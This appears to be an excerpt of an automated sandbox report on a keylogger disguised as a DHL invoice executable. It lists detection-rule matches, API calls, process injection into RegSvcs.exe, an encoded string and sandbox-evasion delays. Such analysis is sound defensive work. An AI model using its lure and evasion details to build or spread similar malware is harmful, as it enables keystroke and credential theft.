Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0039AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput, | 0_2_0039AA57
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003C9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, | 0_2_003C9576

System Summary

Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: DHL DOC INV 191224.gz.exe PID: 2612, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: RegSvcs.exe PID: 6608, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: DHL DOC INV 191224.gz.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: DHL DOC INV 191224.gz.exe, 00000000.00000000.2016872172.00000000003F2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_60409e46-8
Source: DHL DOC INV 191224.gz.exe, 00000000.00000000.2016872172.00000000003F2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_70b09b3f-d
Source: DHL DOC INV 191224.gz.exe | String found in binary or memory: This is a third-party compiled AutoIt script.memstr_6d827433-8
Source: DHL DOC INV 191224.gz.exe | String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_8a4f6258-e
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0039D5EB: CreateFileW,DeviceIoControl,CloseHandle, | 0_2_0039D5EB
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00391201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, | 0_2_00391201
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0039E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState, | 0_2_0039E8F6
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0033BF40 | 0_2_0033BF40
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00338060 | 0_2_00338060
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003A2046 | 0_2_003A2046
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00398298 | 0_2_00398298
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0036E4FF | 0_2_0036E4FF
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0036676B | 0_2_0036676B
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003C4873 | 0_2_003C4873
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0035CAA0 | 0_2_0035CAA0
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0033CAF0 | 0_2_0033CAF0
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0034CC39 | 0_2_0034CC39
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00366DD9 | 0_2_00366DD9
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0034B119 | 0_2_0034B119
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003391C0 | 0_2_003391C0
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00351394 | 0_2_00351394
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00351706 | 0_2_00351706
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0035781B | 0_2_0035781B
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00337920 | 0_2_00337920
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0034997D | 0_2_0034997D
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003519B0 | 0_2_003519B0
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00357A4A | 0_2_00357A4A
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00351C77 | 0_2_00351C77
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00357CA7 | 0_2_00357CA7
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003BBE44 | 0_2_003BBE44
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00369EEE | 0_2_00369EEE
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00351F32 | 0_2_00351F32
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00EB02F8 | 0_2_00EB02F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_015AC146 | 2_2_015AC146
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_015AA088 | 2_2_015AA088
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_015A5362 | 2_2_015A5362
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_015AD2C8 | 2_2_015AD2C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_015AD599 | 2_2_015AD599
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_015AC468 | 2_2_015AC468
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_015AC738 | 2_2_015AC738
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_015A69A0 | 2_2_015A69A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_015A3B95 | 2_2_015A3B95
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_015ACD28 | 2_2_015ACD28
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_015AEC18 | 2_2_015AEC18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_015A6FC8 | 2_2_015A6FC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_015ACFF7 | 2_2_015ACFF7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_015A3E09 | 2_2_015A3E09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_015A29EC | 2_2_015A29EC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_015A3AA1 | 2_2_015A3AA1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_015AEC0A | 2_2_015AEC0A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Code function: 2_2_015AFC90 | 2_2_015AFC90
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: String function: 00339CB3 appears 31 times
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: String function: 0034F9F2 appears 40 times
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: String function: 00350A30 appears 46 times
Source: DHL DOC INV 191224.gz.exe, 00000000.00000003.2050455073.00000000039AD000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs DHL DOC INV 191224.gz.exe
Source: DHL DOC INV 191224.gz.exe, 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameRemington.exe4 vs DHL DOC INV 191224.gz.exe
Source: DHL DOC INV 191224.gz.exe, 00000000.00000003.2051035636.0000000003803000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenamentdll.dllj% vs DHL DOC INV 191224.gz.exe
Source: DHL DOC INV 191224.gz.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 2.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000000.00000002.2053416462.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 00000002.00000002.4474302857.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: DHL DOC INV 191224.gz.exe PID: 2612, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 6608, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, .cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, -.cs | Cryptographic APIs: 'TransformFinalBlock'
Source: 0.2.DHL DOC INV 191224.gz.exe.dc0000.1.raw.unpack, .cs | Base64 encoded string: 'i83QYBE0IwbhVlhQf+svqd5kEAnbbC2RDfNTprP0fRDedGK+iYw6VSAIZu6bbBQz'
Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/2@3/3
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003A37B5 GetLastError,FormatMessageW, | 0_2_003A37B5
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003910BF AdjustTokenPrivileges,CloseHandle, | 0_2_003910BF
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003916C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError, | 0_2_003916C3
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003A51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode, | 0_2_003A51CD
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003BA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle, | 0_2_003BA67C
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003A648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize, | 0_2_003A648E
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003342A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource, | 0_2_003342A2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Mutant created: NULL
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | File created: C:\Users\user\AppData\Local\Temp\aut2DC9.tmp
Source: DHL DOC INV 191224.gz.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: DHL DOC INV 191224.gz.exe | Virustotal: Detection: 47%
Source: DHL DOC INV 191224.gz.exe | ReversingLabs: Detection: 73%
Source: unknown | Process created: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe "C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe"
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe"
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Section loaded: wsock32.dll
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Section loaded: wldp.dll
Source: DHL DOC INV 191224.gz.exe | Static file information: File size 1106432 > 1048576
Source: DHL DOC INV 191224.gz.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: DHL DOC INV 191224.gz.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: DHL DOC INV 191224.gz.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: DHL DOC INV 191224.gz.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: DHL DOC INV 191224.gz.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: DHL DOC INV 191224.gz.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: DHL DOC INV 191224.gz.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: wntdll.pdbUGP source: DHL DOC INV 191224.gz.exe, 00000000.00000003.2050803231.0000000003880000.00000004.00001000.00020000.00000000.sdmp, DHL DOC INV 191224.gz.exe, 00000000.00000003.2051726881.00000000036E0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: DHL DOC INV 191224.gz.exe, 00000000.00000003.2050803231.0000000003880000.00000004.00001000.00020000.00000000.sdmp, DHL DOC INV 191224.gz.exe, 00000000.00000003.2051726881.00000000036E0000.00000004.00001000.00020000.00000000.sdmp
Source: DHL DOC INV 191224.gz.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: DHL DOC INV 191224.gz.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: DHL DOC INV 191224.gz.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: DHL DOC INV 191224.gz.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: DHL DOC INV 191224.gz.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003342DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, | 0_2_003342DE
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_00350A76 push ecx; ret | 0_2_00350A89
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_0034F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, | 0_2_0034F98E
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Code function: 0_2_003C1C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, | 0_2_003C1C41
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Process information set: NOOPENFILEERRORBOX (2 occurrences)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Process information set: NOOPENFILEERRORBOX (58 occurrences)

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep (graph_0-98127)
Source: C:\Users\user\Desktop\DHL DOC INV 191224.gz.exe | API/Special instruction interceptor: Address: EAFF1C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599875
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599766
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599653
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599547
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599437
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 599110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598985
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598604
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598474
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598328
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598219
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 598110
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597989
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597860
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597735
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597610
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597485
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe | Thread delayed: delay time: 597360
